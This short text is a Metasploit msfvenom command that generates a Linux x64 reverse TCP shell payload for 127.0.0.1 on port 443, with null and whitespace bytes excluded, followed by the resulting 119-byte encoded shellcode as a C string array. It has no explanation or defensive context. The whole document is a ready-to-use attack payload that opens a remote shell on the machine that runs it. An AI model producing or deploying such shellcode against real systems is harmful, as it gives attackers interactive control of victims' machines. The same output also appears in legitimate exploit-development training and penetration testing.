msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -f c -b "\x00\x09\x0a\x20"


Payload size: 119 bytes


"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\xcb\xb7\x43\xf4\xb7\xfa\x33\x18\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xa1\x9e\x1b\x6d\xdd\xf8"
"\x6c\x72\xca\xe9\x4c\xf1\xff\x6d\x7b\xa1\xc9\xb7\x42\x4f\xc8"
"\xfa\x33\x19\x9a\xff\xca\x12\xdd\xea\x69\x72\xe1\xef\x4c\xf1"
"\xdd\xf9\x6d\x50\x34\x79\x29\xd5\xef\xf5\x36\x6d\x3d\xdd\x78"
"\xac\x2e\xb2\x88\x37\xa9\xde\x2d\xdb\xc4\x92\x33\x4b\x83\x3e"
"\xa4\xa6\xe0\xb2\xba\xfe\xc4\xb2\x43\xf4\xb7\xfa\x33\x18"
